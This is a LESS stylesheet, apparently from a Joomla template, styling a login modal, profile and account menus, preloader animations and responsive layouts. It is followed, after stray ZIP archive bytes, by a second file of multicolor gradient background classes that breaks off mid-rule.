/* ************** 	 START POPUP (MODAL) LOGIN 	  *************** */
.modal-login {
	text-align: center;
	
	.modal-content {
		border:1px solid rgba(0,0,0,.1);
		-webkit-box-shadow:0 4px 20px rgba(0,0,0,.35);
		box-shadow:0 4px 20px rgba(0,0,0,.35);
	}
}

.modal-backdrop {
	background:rgba(0,0,0,0.45);
	
	&.in {
		z-index:110; /* Fix for Sticky Header to avoid Bootstrap modal window to be grayed out [closed] */
	}
	
	
}

@media screen and (min-width: 768px) { 
	.modal:before {
		display: inline-block;
		vertical-align: middle;
		content: " ";
		height: 100%;
	}
}

.modal-login .modal-dialog {
	display: inline-block;
	text-align: left;
	vertical-align: middle;
}

.top-divider {
	line-height:1.2;
	position:absolute;
	top:0;
	width:1px;
	height:100%;
	padding:0;
	margin:0;
	opacity:0.2;
	border:0;
	border-left:1px solid #999;
}

.ap-modal-login{
	margin:-1px 0 -7px;
	padding:0;
	
	.ap-login,
	.ap-signin{
		margin:0;
		padding:0;
		display:block;
		a{
			padding:0 10px;
			line-height:20px;
			display:inline-block;
			vertical-align:top;
			margin-top:0;
			
			i{
				&.pe {
					font-size: 22px;
					line-height:20px;
					margin:0 4px;
					vertical-align:middle;
				}
			}
			.info-content {
				vertical-align:middle;
		
			}
		}
	}
	.title{
		
		margin:0 auto;
		
		i.pe {
			font-size:36px;
			line-height:37px;
			vertical-align:top;
			margin:-1px 8px 0 0;
		}
	}
	.modal-content{
	
		padding: 30px;
		font-size: 14px;
		.modal-header{
			border: none;
		}
		.modal-body{
			margin-bottom: 30px;
			
			.pretext {
				margin-bottom: 20px;
			}

			.posttext {
				margin-top: 20px;
			}
			// Secret Key field
			.controls {
				margin: 20px auto 0;
				
				.input-prepend,
				.input-append {
				
					.add-on {
						width:50px;
						height:44px;

						span {
							line-height:32px;
							font-size:16px;
							color:#909090;
							
						}
						&:hover {
							span {
								color:#555;
							}
						}
						
					}
				}
				input.form-control {
					min-height:44px;
					width:100%;
				}
			}
			
			input[type="text"]{
				margin-bottom: 20px;
			}
			.button-wrap{
				position: relative;
				line-height: 42px;
				float:left;
				
			}
			input[type="submit"]{
				z-index: 1;
				/*padding:10px 30px;*/
			}
			.input-block-level {
				min-height:44px;
			}
			.remember-wrap{
				width: 100%;
				overflow: hidden;
				min-height: 70px;
				text-align: left;
				label{
					margin: 20px 0 0;
					vertical-align: middle;
				}
			}
			
			
			.forget-name-link{
				max-height: 30px;
				line-height: 30px;
				font-weight: 400;
				margin-left: 10px;
				padding-top: 5px;
				float:left!important;
				a{
					font-weight: 600;
				}
			}
		}
		.modal-footer{
			max-height: 40px;
			line-height: 40px;
			font-weight: 500;
			text-align: center;
			
		}
	}
	.modal-header{
		.title{
			text-align: left;
			margin-top: 0;
		}
		.close{
			margin-top: -2px;
			position: absolute;
			right: 10px;
			top: 10px;
			padding: 10px;
			text-align: center;
			.transition(.3s);
			
			i{
				margin-right: 0;
				font-size:32px;
			}
		}
	}
	
	.dropdown {
		
		.dropdown-menu {
			position: absolute;
			opacity:0;
			visibility:hidden;
			z-index: 1000;
			display: block;
			float: left;
			right:0;
			left:auto;
			min-width: 200px;
			border: 1px solid #ccc;
			border: 1px solid rgba(0, 0, 0, .12);
			border-radius: 0 0 4px 4px;
			-webkit-box-shadow: 0 4px 9px rgba(0, 0, 0, .12);
			box-shadow: 0 4px 9px rgba(0, 0, 0, .12);
			.transition(all 0.35s cubic-bezier(0.225, 0.025, 0.225, 1.225));
			-webkit-transform: translateY(-20px) scale(0.9) perspective(800px) rotateX(30deg);
			-moz-transform: translateY(-20px) scale(0.9) perspective(800px) rotateX(30deg);
			-ms-transform: translateY(-20px) scale(0.9) perspective(800px) rotateX(30deg);
			-o-transform: translateY(-20px) scale(0.9) perspective(800px) rotateX(30deg);
			transform: translateY(-20px) scale(0.9) perspective(800px) rotateX(30deg);
		}
	}
	.open {
		z-index:13999;
		.dropdown-menu {
			opacity:1;
			visibility:visible;
			position:absolute;
			z-index:13999;
			-webkit-transform: translateY(0) scale(1) perspective(1000px) rotateX(0deg);
			-moz-transform: translateY(0) scale(1) perspective(1000px) rotateX(0deg);
			-ms-transform: translateY(0) scale(1) perspective(1000px) rotateX(0deg);
			-o-transform: translateY(0) scale(1) perspective(1000px) rotateX(0deg);
			transform: translateY(0) scale(1) perspective(1000px) rotateX(0deg);
		}
	}
	button {
		background:transparent;
	}
	
}

//My Profile
.profile {
	fieldset {
		
		legend {
		   line-height:1.5;
		}
		.dl-horizontal {
			margin:0 auto 45px;
			dt, dd {
				line-height:27px;
				vertical-align:middle;
				padding:3px;
				margin:0 auto 5px;
			}
			dt {
				min-width:25%;
				display:block;
			}
		}
	}
}

//view-profile
.view-profile{
	.select-menu select{
		display: block;
	}
	button{
		&:focus{
			outline: none;
		}
	}
	a[title="Cancel"]{
		background-color: lighten(@gray, 20%);
		color:#fff;
		&:hover{
			background-color: lighten(@gray, 10%);
		}
	}
}

//my-account-menu
.ap-my-account-menu{
	position: relative;
	cursor: pointer;
	padding:0;
	
	
	.signin-img-wrap{
		float: left;
		height:20px;
		line-height:21px;
		i{
			&.pe {
				font-size: 20px;
				margin:0 0 0 4px;
				line-height:21px;
				vertical-align:middle;
			}
		}
		img{
			display: inline-block;
		}
	}
	.info-wrap{
		//float: left;
		display:inline-block;
		margin-left: 8px;
		margin-bottom:7px;
		line-height:24px;
		.info-text {
			font-size:14px;
			
		}
	}
	
	ul>li{
		//overflow: hidden;
	}
	ul.menu{
		padding:5px 0;
		>li{
			border: none;
			min-width: 200px;
			border-bottom:1px solid rgba(189,189,189,0.2);
			
			a {
				i {
					
					width:22px;
					line-height:18px;
					display:inline-block;
					vertical-align:top;	
					
					&.fa, &.fas, &.far {
						margin-top:9px;
						font-size:17px;
					}
					&.pe {
						margin-top:8px;
						font-size:18px;
					}
				}
			}
	
			&:last-child {
				border-bottom: none;
				a{
					padding-bottom:6px;
					i.pe {
						font-size:22px;
						width:25px;
						line-height:20px;
					}
				}	
			}
		}
		a {
			display: block;
			padding: 4px 20px;
			font-size: 14px;
			font-weight: 400;
			cursor: pointer;
			
			&:before{
				display: none;				
			}
		}
	}
	
}

// Login, Registration, Reset, Remind
.login-wrapper,
.registration-wrapper,
.reset-wrapper,
.remind-wrapper {
	>i {
		&.pe {
			position:absolute;
			top:7vh;
			left:2vw;
			font-size:20vw;
		}
	}
	.group-control {
		input {
			min-height: 45px;
		}
	}
}

.login-wrapper {
	>i {
		&.pe {
			-webkit-transform: rotate(28deg);
			transform: rotate(28deg);
			top:9vh;
			right:8vw;
			left:auto;
			font-size:22vw;
		}
	}
}
.remind-wrapper { 
   margin: 10vh auto;
   	>i {
		&.pe {
			font-size:17vw;
			left:2vw;
		}
	}
}
.reset-wrapper{ 
	margin: 10vh auto;
	>i {
		&.pe {
			left:7vw;
		}
	}
}

/* ************   START Pre-Loader CSS   ************** */
/* **************************************************** */

.sp-pre-loader {
    position: fixed;
	left: 0;
    top: 0;
	width: 100vw;
	height:100vh;
    z-index: 999;
	

    // Clock loader
    .sp-loader-clock {
        border-radius: 60px;
        bottom: 0;
        height: 80px;
        left: 0;
        margin: auto;
        position: absolute;
        right: 0;
        top: 0;
        width: 80px;
        &:after{
            content: "";
            position: absolute;
            top:2px;
            left: 48%;
            height: 38px;
            width: 4px;
            border-radius: 5px;
            -webkit-transform-origin: 50% 97%;
            transform-origin: 50% 97%;
            -webkit-animation: grdAiguille 2s linear infinite;
            animation: grdAiguille 2s linear infinite;
        }

        &:before{
            content: "";
            position: absolute;
            top:6px;
            left: 48%;
            height: 35px;
            width: 4px;
            border-radius: 5px;
            -webkit-transform-origin: 50% 94%;
            transform-origin: 50% 94%;
            -webkit-animation: ptAiguille 12s linear infinite;
            animation: ptAiguille 12s linear infinite;
        }
    }
    // Circle Loader (default)
    .sp-loader-circle{
        position: absolute;
        height: 50px;
        width: 50px;
        border-radius: 50px;
        left: 0;
        top: -4px;
        right: 0;
        bottom: 0;
        margin: auto;
        -webkit-transform-origin: 50% 50%;
        transform-origin: 50% 50%;
        -webkit-animation: loader1 1s linear infinite;
        animation: loader1 1s linear infinite;
        &:after{
			
			content: "";
			position: absolute;
			top: -4px;
			left: -4px;
			height: 50px;
        	width: 50px;
			border-radius: 50px;
			border: 4px solid transparent;
		 
        }
    }
	
	
	// Flip Loader
	.loader-flip{
		position: absolute;
		width: 100px;
		height: 100px;
		margin: auto;
		left: 0;
		top: 0;
		right: 0;
		bottom: 0;
		-webkit-perspective: 120px;
		-moz-perspective: 120px;
		-ms-perspective: 120px;
		perspective: 120px;
		
		  &:after{
			content: "";
			position: absolute;
			left: 25px;
			top: 25px;
			width: 50px;
			height: 50px;
			border-radius:4px;
			-webkit-animation: flip 1s linear infinite;
			animation: flip 1s linear infinite;
		}
	}
	
    // Bubble Loop Loader
    .sp-loader-bubble-loop{
        position: absolute;
        width: 12px;
        height: 12px;
        left: 0;
        top: 0;
        right: 0;
        bottom: 0;
        margin: auto;
        border-radius: 12px;
        -webkit-transform-origin:  50% 50%;
        transform-origin:  50% 50% ;
        -webkit-animation: loader6 1s ease-in-out infinite;
        animation: loader6 1s ease-in-out infinite;
        &:before{
            content: "";
            position: absolute;
            top: 0px;
            left: -25px;
            height: 12px;
            width: 12px;
            border-radius: 12px;
        }
        &:after{
            content: "";
            position: absolute;
            top: 0px;
            left: 25px;
            height: 12px;
            width: 12px;
            border-radius: 12px;
        }
    }
    // Circle Loader Two
    .circle-two {
        bottom: 0;
        height: 100px;
        left: 0;
        margin: auto;
        position: absolute;
        right: 0;
        top: 0;
        width: 100px;
    }
    .circle-two > span,
    .circle-two > span:before,
        .circle-two > span:after {
        content: "";
        display: block;
        border-radius: 50%;
        position: absolute;
        top: 50%;
        left: 50%;
        -webkit-transform: translate(-50%, -50%);
        -moz-transform: translate(-50%, -50%);
        -ms-transform: translate(-50%, -50%);
        -o-transform: translate(-50%, -50%);
        transform: translate(-50%, -50%);
    }
    .circle-two > span {
        width: 100%;
        height: 100%;
        top: 0;
        left: 0;
        border-left-color: transparent;
        -webkit-animation: effect-2 2s infinite linear;
        -moz-animation: effect-2 2s infinite linear;
        -ms-animation: effect-2 2s infinite linear;
        -o-animation: effect-2 2s infinite linear;
        animation: effect-2 2s infinite linear;
    }
    .circle-two > span:before {
        width: 75%;
        height: 75%;
        border-right-color: transparent;
    }
    .circle-two > span:after {
        width: 50%;
        height: 50%;
        border-bottom-color: transparent;
    }

    // Audio Wave 2 Loader
    .wave-two-wrap{
        position: absolute;
        margin: auto;
        left: 0;
        right: 0;
        top: 50%;
        width: 90px;
    }
    .wave-two {
        margin: 0;
        list-style: none;
        width: 90px;
        position: relative;
        padding: 0;
        height: 10px;
    }
    .wave-two li {
        position: absolute;
        width: 2px;
        height: 0;
        bottom: 0;
    }

    .wave-two li:nth-child(1) {
        left: 0;
        -webkit-animation: sequence1 1s ease infinite 0;
        animation: sequence1 1s ease infinite 0;
    }
    .wave-two li:nth-child(2) {
        left: 15px;
        -webkit-animation: sequence2 1s ease infinite 0.1s;
        animation: sequence2 1s ease infinite 0.1s;
    }
    .wave-two li:nth-child(3) {
        left: 30px;
        -webkit-animation: sequence1 1s ease-in-out infinite 0.2s;
        animation: sequence1 1s ease-in-out infinite 0.2s;
    }
    .wave-two li:nth-child(4) {
        left: 45px;
        -webkit-animation: sequence2 1s ease-in infinite 0.3s;
        animation: sequence2 1s ease-in infinite 0.3s;
    }
    .wave-two li:nth-child(5) {
        left: 60px;
        -webkit-animation: sequence1 1s ease-in-out infinite 0.4s;
        animation: sequence1 1s ease-in-out infinite 0.4s;
    }
    .wave-two li:nth-child(6) {
        left: 75px;
        -webkit-animation: sequence2 1s ease infinite 0.5s;
        animation: sequence2 1s ease infinite 0.5s;
    }

    // Audio Wave Loader
    .sp-loader-audio-wave {
        width: 3em;
        height: 2em;
        background-repeat: no-repeat;
        background-size: 0.5em 0.25em, 0.5em 0.25em, 0.5em 0.25em, 0.5em 0.25em, 0.5em 0.25em;
        animation: audioWave 1.5s linear infinite;
        position: absolute;
        left: 0;
        top: 0;
        bottom: 0;
        right: 0;
        margin: auto;
    }

    // Loader With Logo
    .sp-loader-with-logo{
        top: 0;
        left: 0;
        width: 100%;
        height: 110px;
        right: 0;
        bottom: 0;
        margin: auto;
        text-align: center;
        position: absolute;
        .logo {
            display: inline-block;
            width: auto;
			> img {
				max-height:100%;
			}
        }
        .line{
            bottom: 0;
            height: 3px;
            left: 0;
            position: absolute;
            top: auto;
        }
    }
}

/* *************   END:: Pre-Loader CSS   ************* */
/* **************************************************** */

/* ************   START Loader Animation   ************ */
/* **************************************************** */

@-webkit-keyframes flip {
	0% {-webkit-transform: rotate(0);}
	50% {-webkit-transform: rotateY(180deg);}
	100% {-webkit-transform: rotateY(180deg)  rotateX(180deg);}
}

@keyframes flip {
	0% {transform: rotate(0);}
	50% {transform: rotateY(180deg);}
	100% {transform: rotateY(180deg)  rotateX(180deg);}
}

// Clock Loader Animation
@-webkit-keyframes grdAiguille{
    0%{-webkit-transform:rotate(0deg);}
    100%{-webkit-transform:rotate(360deg);}
}

@keyframes grdAiguille{
    0%{transform:rotate(0deg);}
    100%{transform:rotate(360deg);}
}
@-webkit-keyframes ptAiguille{
    0%{-webkit-transform:rotate(0deg);}
    100%{-webkit-transform:rotate(360deg);}
}
@keyframes ptAiguille{
    0%{transform:rotate(0deg);}
    100%{transform:rotate(360deg);}
}

// Circle Loader Animation
@-webkit-keyframes loader1{
    0%{-webkit-transform:rotate(0deg);}
    100%{-webkit-transform:rotate(360deg);}
}

@keyframes loader1{
    0%{transform:rotate(0deg);}
    100%{transform:rotate(360deg);}
}

// Bubble Loop Loader Animation
@-webkit-keyframes loader6{
    0%{-webkit-transform:rotate(0deg);}
    50%{-webkit-transform:rotate(180deg);}
    100%{-webkit-transform:rotate(180deg);}
}
@keyframes loader6{
    0%{transform:rotate(0deg);}
    50%{transform:rotate(180deg);}
    100%{transform:rotate(180deg);}
}

// Ring Loader Animation
@keyframes rotate-360 {
    from {
        -moz-transform: rotate(0);
        -ms-transform: rotate(0);
        -webkit-transform: rotate(0);
        transform: rotate(0);
    }
    to {
        -moz-transform: rotate(360deg);
        -ms-transform: rotate(360deg);
        -webkit-transform: rotate(360deg);
        transform: rotate(360deg);
    }
}

// Audio Wave Loader Animation
@keyframes audioWave {
    25% {
        background: linear-gradient(@preloader_tx, @preloader_tx) 0 50%, linear-gradient(@preloader_tx, @preloader_tx) 0.625em 50%, linear-gradient(@preloader_tx, @preloader_tx) 1.25em 50%, linear-gradient(@preloader_tx, @preloader_tx) 1.875em 50%, linear-gradient(@preloader_tx, @preloader_tx) 2.5em 50%;
        background-repeat: no-repeat;
        background-size: 0.5em 2em, 0.5em 0.25em, 0.5em 0.25em, 0.5em 0.25em, 0.5em 0.25em;
    }
    37.5% {
        background: linear-gradient(@preloader_tx, @preloader_tx) 0 50%, linear-gradient(@preloader_tx, @preloader_tx) 0.625em 50%, linear-gradient(@preloader_tx, @preloader_tx) 1.25em 50%, linear-gradient(@preloader_tx, @preloader_tx) 1.875em 50%, linear-gradient(@preloader_tx, @preloader_tx) 2.5em 50%;
        background-repeat: no-repeat;
        background-size: 0.5em 0.25em, 0.5em 2em, 0.5em 0.25em, 0.5em 0.25em, 0.5em 0.25em;
    }
    50% {
        background: linear-gradient(@preloader_tx, @preloader_tx) 0 50%, linear-gradient(@preloader_tx, @preloader_tx) 0.625em 50%, linear-gradient(@preloader_tx, @preloader_tx) 1.25em 50%, linear-gradient(@preloader_tx, @preloader_tx) 1.875em 50%, linear-gradient(@preloader_tx, @preloader_tx) 2.5em 50%;
        background-repeat: no-repeat;
        background-size: 0.5em 0.25em, 0.5em 0.25em, 0.5em 2em, 0.5em 0.25em, 0.5em 0.25em;
    }
    62.5% {
        background: linear-gradient(@preloader_tx, @preloader_tx) 0 50%, linear-gradient(@preloader_tx, @preloader_tx) 0.625em 50%, linear-gradient(@preloader_tx, @preloader_tx) 1.25em 50%, linear-gradient(@preloader_tx, @preloader_tx) 1.875em 50%, linear-gradient(@preloader_tx, @preloader_tx) 2.5em 50%;
        background-repeat: no-repeat;
        background-size: 0.5em 0.25em, 0.5em 0.25em, 0.5em 0.25em, 0.5em 2em, 0.5em 0.25em;
    }
    75% {
        background: linear-gradient(@preloader_tx, @preloader_tx) 0 50%, linear-gradient(@preloader_tx, @preloader_tx) 0.625em 50%, linear-gradient(@preloader_tx, @preloader_tx) 1.25em 50%, linear-gradient(@preloader_tx, @preloader_tx) 1.875em 50%, linear-gradient(@preloader_tx, @preloader_tx) 2.5em 50%;
        background-repeat: no-repeat;
        background-size: 0.5em 0.25em, 0.5em 0.25em, 0.5em 0.25em, 0.5em 0.25em, 0.5em 2em;
    }
}

// Circle 2 Loader Animation
@-webkit-keyframes effect-2 {
    from {
        -webkit-transform: rotate(0deg);
        transform: rotate(0deg);
    }
    to {
        -webkit-transform: rotate(360deg);
        transform: rotate(360deg);
    }
}
@keyframes effect-2 {
    from {
        -moz-transform: rotate(0deg);
        -ms-transform: rotate(0deg);
        transform: rotate(0deg);
    }
    to {
        -moz-transform: rotate(360deg);
        -ms-transform: rotate(360deg);
        transform: rotate(360deg);
    }
}

// Audio Wave Loader 2 animation
@keyframes sequence1 {
    0% {
        height: 10px;
    }
    50% {
        height: 50px;
    }
    100% {
        height: 10px;
    }
}
@keyframes sequence2 {
    0% {
        height: 20px;
    }
    50% {
        height: 65px;
    }
    100% {
        height: 20px;
    }
}

@keyframes rot1 {
    100% {
        transform: skew(-10deg) translateX(50px) rotate(405deg);
    }
}
@-webkit-keyframes rot1 {
    100% {
        -webkit-transform: skew(-10deg) translateX(50px) rotate(405deg);
    }
}
@keyframes rot2 {
    100% {
        transform: skew(-10deg) rotate(525deg);
    }
}
@-webkit-keyframes rot2 {
    100% {
        -webkit-transform: skew(-10deg) rotate(525deg);
    }
}
@keyframes rot3 {
    100% {
        transform: skew(-10deg) translateX(20px) translateY(-50px) rotate(645deg);
    }
}
@-webkit-keyframes rot3 {
    100% {
        -webkit-transform: skew(-10deg) translateX(20px) translateY(-50px) rotate(645deg);
    }
}

@keyframes width {
    10% {
        width: 10%;
    }
    20% {
        width: 20%;
    }
    30% {
        width: 30%;
    }
    40% {
        width: 40%;
    }
    50% {
        width: 50%;
    }
    60% {
        width: 60%;
    }
    70% {
        width: 70%;
    }
    80% {
        width: 80%;
    }
    90% {
        width: 90%;
    }
    100% {
        width: 100%;
    }
}

/* ***********   END:: Loader Animation   ************* */
/* **************************************************** */

/* **********   END:: Helix 1.5 Loader Css   ********** */
/* **************************************************** */

/* ************ START Animations Header *************** */
/* **************************************************** */

.animated{
    -webkit-animation-duration:1s;
    animation-duration:1s;
    -webkit-animation-fill-mode:forwards;
    animation-fill-mode:forwards;
}
.animated-2s{
    -webkit-animation-duration:2s;
    animation-duration:2s;
    -webkit-animation-fill-mode:forwards;
    animation-fill-mode:forwards;
}

@-webkit-keyframes fadeInDown{
    from{
        opacity:0;
        -webkit-transform:translate3d(0,-50px,0);
        transform:translate3d(0,-50px,0);
    }
    to{
        opacity:1;
        -webkit-transform:none;
        transform:none;
    }
}
@keyframes fadeInDown{
    from{
        opacity:0;
        -webkit-transform:translate3d(0,-50px,0);
        transform:translate3d(0,-50px,0);
    }
    to{
        opacity:1;
        -webkit-transform:none;
        transform:none;
    }
}
.fadeInDown{
    -webkit-animation-name:fadeInDown;
    animation-name:fadeInDown;
}

@-webkit-keyframes fadeIn{
    from{
        opacity:0;
        -webkit-transform:translate3d(0,30px,0);
        transform:translate3d(0,30px,0);
    }
    to{
        opacity:1;
        -webkit-transform:none;
        transform:none;
    }
}
@keyframes fadeIn{
    from{
        opacity:0;
        -webkit-transform:translate3d(0,30px,0);
        transform:translate3d(0,30px,0);
    }
    to{
        opacity:1;
        -webkit-transform:none;
        transform:none;
    }
}
.fadeIn{
    -webkit-animation-name:fadeIn;
    animation-name:fadeIn;
}


/* ************ END:: Animations Header *************** */
/* **************************************************** */

/* *********   START Responsive Media Query   ********* */
/* **************************************************** */
//Tablet
@media screen and (min-width: 768px) and (max-width: 1199px){
    .scrollup {
        bottom: 25px;
        right: 25px;
    }
    #sp-header {
        top: 65px;
    }
}
//Mobile Device
@media screen and (min-width: 320px) and (max-width: 767px){
    //Top social
    ul.social-icons {
        margin: 0;
        width: 100%;
        text-align: center;
        > li{
            // margin: 5px;
        }
    }
    .sp-contact-info {
        margin: 0;
        text-align: center;
        width: 100%;
        li{
            //margin: 0 5px;
            font-size: 89%;
        }
    }
}

/* *********   END:: Responsive Media Query   ********* */
/* **************************************************** */

/* Edit Article (added from Flex 2.7, for Joomla 3.8) */
.edit-article {
	margin:0;
	float:right;
	display:inline-block;
	position:relative;
	width:100px;
	z-index:2;
	background:transparent;
	
	.btn.dropdown-toggle {
		border:1px solid lighten(@major_color, 5%);
		background:transparent;
		color:#777;
		padding:6px 10px; 
		margin-top:4px;
		
		&:before {
			font-family: 'peIcon7';
			content: "\e62c";
			font-size:21px;
			line-height:24px;
			margin:0 7px 0 10px;
			
		}
		&:hover {
			border:1px solid darken(@major_color, 5%);
			color:#444;
		}
		
		.icon-cog {
			display:none;
		}
		.caret {
			margin:12px 8px 0 0;
			vertical-align:top;
		}
	
	}

}


/* Lazy Loading for images. From Flex 3.5 */
.lazyload,.lazyloading {
	opacity: 0;
	height:100%;
}
.lazyloaded {
	opacity: 1;
	.transition(opacity 650ms ease);
}

/* SP Cookie Consent */
#sp-cookie-consent.position-bottom_left,
#sp-cookie-consent.position-bottom_right {
	box-shadow:0 3px 8px rgba(50,50,50,.25);
}PK!��q`
�
�#flex/less/multicolor-gradients.lessnu&1i�
// Multicolor Gradients

.spectrum-background {
background:linear-gradient(red, transparent),linear-gradient(to top left, lime, transparent),linear-gradient(to top right, blue, transparent);background-blend-mode: screen;
}
.elegant-rainbow {
background: linear-gradient(219.46deg, #110036 27.63%, #170059 100%), linear-gradient(219.46deg, #FFFFFF 27.63%, #19004E 100%), radial-gradient(100% 246.94% at 100% 100%, #FFFFFF 0%, #000353 100%), linear-gradient(121.18deg, #1400FF 0.45%, #3A0000 100%), linear-gradient(192.86deg, #F06060 9.22%, #008B7A 87.25%), linear-gradient(150.76deg, #0015D5 15.35%, #000B6C 89.57%);
background-blend-mode: screen, overlay, overlay, difference, difference, normal;
}
.colored-petal {
background: radial-gradient(circle at 50% 50%, #FFFFFF 0%, #000000 100%), conic-gradient(red, yellow, lime, aqua, blue, fuchsia, red);
background-blend-mode: color-dodge, normal;
}
.energetic-soul {
background: linear-gradient(0deg, #FFFFFF 0%, #5C0000 100%), radial-gradient(100% 246.94% at 0% 100%, #E4FFCF 0%, #00B43D 100%), linear-gradient(238.72deg, #0065FC 0%, #61FF00 100%), radial-gradient(100% 188.01% at 76.14% 0%, #80FF00 0%, #00FFF0 100%), linear-gradient(0deg, #00C2FF 0%, #FFC700 100%), linear-gradient(121.28deg, #8000FF 0%, #0085FF 100%), radial-gradient(100% 148.07% at 0% 0%, #FC8800 0%, #00FF94 100%);
background-blend-mode: overlay, multiply, color-dodge, difference, hue, color-dodge, normal;
}
.fable-wave{
background: linear-gradient(115deg, rgb(211, 255, 215) 0%, rgb(0, 0, 0) 100%), radial-gradient(90% 100% at 50% 0%, rgb(200, 200, 200) 0%, rgb(22, 0, 45) 100%), radial-gradient(100% 100% at 80% 0%, rgb(250, 255, 0) 0%, rgb(36, 0, 0) 100%), radial-gradient(150% 210% at 100% 0%, rgb(112, 255, 0) 0%, rgb(20, 175, 125) 0%, rgb(0, 10, 255) 100%), radial-gradient(100% 100% at 100% 30%, rgb(255, 77, 0) 0%, rgba(0, 200, 255, 1) 100%), linear-gradient(60deg, rgb(255, 0, 0) 0%, rgb(120, 86, 255) 100%);
background-blend-mode: overlay, overlay, difference, difference, difference, normal;
}
.bright-brain {
background: radial-gradient(50% 123.47% at 50% 50%, #00FF94 0%, #720059 100%), linear-gradient(121.28deg, #669600 0%, #FF0000 100%), linear-gradient(360deg, #0029FF 0%, #8FFF00 100%), radial-gradient(100% 164.72% at 100% 100%, #6100FF 0%, #00FF57 100%), radial-gradient(100% 148.07% at 0% 0%, #FFF500 0%, #51D500 100%);
background-blend-mode: screen, color-dodge, overlay, difference, normal;
}
.confusing-fluid {
background: linear-gradient(180deg, #000346 0%, #FF0000 100%), linear-gradient(58.72deg, #0029FF 0%, #AA0014 100%), radial-gradient(100% 164.72% at 100% 100%, #FF00A8 0%, #00FF47 100%), radial-gradient(100% 148.07% at 0% 0%, #FFF500 0%, #51D500 100%);
background-blend-mode: overlay, overlay, difference, normal;
}
.violet-orange{
background: linear-gradient(123deg, #461B93 0%, #461B93 40%, #6A3CBC calc(40% + 1px), #6A3CBC 60%, #8253D7 calc(60% + 1px), #8253D7 70%, rgba(255,141,15,.9) calc(70% + 1px), rgba(242,90,72,.7) 100%);
}
/*
.color-play{
background: radial-gradient(50% 123.47% at 50% 50%, #00FF94 0%, #720059 100%), linear-gradient(121.28deg, #669600 0%, #FF0000 100%), linear-gradient(360deg, #0029FF 0%, #8FFF00 100%), radial-gradient(100% 164.72% at 100% 100%, #6100FF 0%, #00FF57 100%), radial-gradient(100% 148.07% at 0% 0%, #FFF500 0%, #51D500 100%);
background-blend-mode: screen, color-dodge, overlay, difference, normal;
}
*/
.dynamic-rainbow{
background: linear-gradient(151.44deg, #1F009B 0%, #FFFFFF 36.75%), linear-gradient(140.54deg, #FFFFFF 27.63%, #860000 100%), linear-gradient(140.54deg, #FFFFFF 27.63%, #510000 100%), linear-gradient(127.43deg, #BECE00 0%, #FFFFFF 100%), radial-gradient(111.5% 111.5% at 83.93% 106%, #FFFFFF 0%, #20009F 100%), radial-gradient(111% 111% at 74.29% -11%, #0500FF 0%, #FFD600 100%), linear-gradient(127.43deg, #B7D500 0%, #2200AA 100%);
background-blend-mode: multiply, difference, overlay, overlay, difference, difference, normal;
}
.paypal-blue{
background:linear-gradient(45deg, rgba(32,172,250,.1) 10%,rgba(255,255,255,.45) 51%,rgba(255,255,255,.1) 51%,rgba(32,172,250,.05) 80%),linear-gradient(45deg, rgba(11,89,167,1) 0%, rgba(32,172,250,1) 50%, rgba(11,89,167,1) 100%), linear-gradient(45deg, #f2f6f8 0%,#d8e1e7 50%,#b5c6d0 51%,#e0eff9 100%);
}
.new-blush{
background: linear-gradient(121.28deg, #DC8400 0%, #FFFFFF 40.08%), linear-gradient(140.54deg, #FF0000 0%, #0047FF 72.37%), linear-gradient(121.28deg, #00E384 0%, #FF0000 100%), linear-gradient(121.28deg, #FA00FF 0%, #00FF38 100%), linear-gradient(127.43deg, #00F0FF 0%, #A80000 100%), radial-gradient(100.47% 100% at 50% 100%, #70FF00 0%, #680199 100%), linear-gradient(127.43deg, #B7D500 0%, #2200AA 100%);
background-blend-mode: darken, hue, overlay, color, color-dodge, difference, normal;
}
.artificial-nature {
background: linear-gradient(140.54deg, #608D00 0%, #D30000 72.37%), linear-gradient(58.72deg, #0029FF 0%, #8FFF00 100%), radial-gradient(100% 164.72% at 100% 100%, #6100FF 0%, #00FF57 100%), radial-gradient(100% 148.07% at 0% 0%, #FFF500 0%, #51D500 100%);
background-blend-mode: color-dodge, overlay, difference, normal;
}
.first-chapter{
background: linear-gradient(238.72deg, #FFE5C7 0%, #00C288 100%), radial-gradient(90.88% 100% at 50% 0%, #439246 0%, #183766 100%), linear-gradient(121.28deg, #FFEAB6 0%, #003C2A 100%), radial-gradient(64.89% 100% at 50% 0%, #80BAFF 0%, #001E41 100%), linear-gradient(65.05deg, #6F0072 0%, #FFC700 100%);
background-blend-mode: overlay, screen, color-burn, lighten, normal;
}
.sensitive-destination {
background: linear-gradient(120deg, #FF00C7 0%, #51003F 100%), linear-gradient(120deg, #0030AD 0%, #00071A 100%), linear-gradient(180deg, #000346 0%, #FF0000 100%), linear-gradient(60deg, #0029FF 0%, #AA0014 100%), radial-gradient(100% 165% at 100% 100%, #FF00A8 0%, #00FF47 100%), radial-gradient(100% 150% at 0% 0%, #FFF500 0%, #51D500 100%);
background-blend-mode: overlay, color-dodge, overlay, overlay, difference, normal;
}
.illusive-love{
background: linear-gradient(58.72deg, #FF20DB 0%, #FFFFFF 100%), linear-gradient(180deg, #FFFFFF 0%, #060046 100%), linear-gradient(64.82deg, #AD00FF 0%, #FF0000 100%), linear-gradient(307.27deg, #FF9900 0.37%, #150052 100%), radial-gradient(67.08% 100% at 50% 0%, #76005C 0%, #0500FF 100%), radial-gradient(100% 140% at 100% 0%, #5ED500 0%, #2200AA 100%);
background-blend-mode: soft-light, overlay, difference, difference, color-burn, normal;
}
.chroma-serenity{
background: linear-gradient(50.22deg, #0066FF 0%, #FFAA7A 51.63%), linear-gradient(238.72deg, #FF0000 0%, #000000 100%), linear-gradient(301.28deg, #FF0000 0%, #735A00 100%), linear-gradient(121.28deg, #207A00 0%, #950000 100%), linear-gradient(238.72deg, #FFB800 0%, #000000 100%), linear-gradient(238.72deg, #00D1FF 0%, #00FF38 100%), linear-gradient(58.72deg, #B80000 0%, #1B00C2 100%), linear-gradient(125.95deg, #00E0FF 10.95%, #87009D 100%), linear-gradient(263.7deg, #B60000 3.43%, #B100A0 96.57%), linear-gradient(130.22deg, #DBFF00 18.02%, #3300FF 100%);
background-blend-mode: multiply, color-dodge, difference, color-dodge, difference, lighten, difference, color-dodge, difference, normal;
}
.yellow-tickets{
